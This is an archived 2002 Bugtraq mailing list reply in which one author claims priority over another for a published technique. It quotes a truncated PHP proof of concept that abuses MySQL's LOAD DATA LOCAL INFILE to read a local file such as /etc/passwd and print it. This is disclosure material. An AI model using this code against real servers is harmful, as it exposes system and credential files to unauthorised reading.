Bugtraq mailing list archives
Re: File reading vulnerable in PHP and MySQL (Local Exploit)
From: Dave Wilson <dw () botanicus net>
Date: Wed, 27 Nov 2002 09:54:58 +0000
Hi there, Please see http://botanicus.net/dw/sec.html - I wrote about this in February. Prior to that, other people have claimed to have come across this too. On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:
Attacker can use PHP and mySQL to read some local file following this way: # Create a database (mySQL) and upload this file to your server PHP Code: viewfile.php (programmed by Luke) ====================================================== <? // config this data $dbhost = ""; $dbuser = ""; $dbpasswd = ""; $dbname = ""; $file = "/etc/passwd"; // filename that you wanna view // shell code echo "<pre>"; mysql_connect ($dbhost, $dbuser, $dbpasswd); $sql = array ( "USE $dbname", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1" );
Umm, this is my code. Please check any good Bugtraq archive for proof of this fact. This is pretty much identical, except my English is better :-).
Luke (HVA) http://www.hackervn.net
Dave Wilson.
Current thread:
- File reading vulnerable in PHP and MySQL (Local Exploit) Hai Nam Luke (Nov 27)
- Re: File reading vulnerable in PHP and MySQL (Local Exploit) Dave Wilson (Nov 28)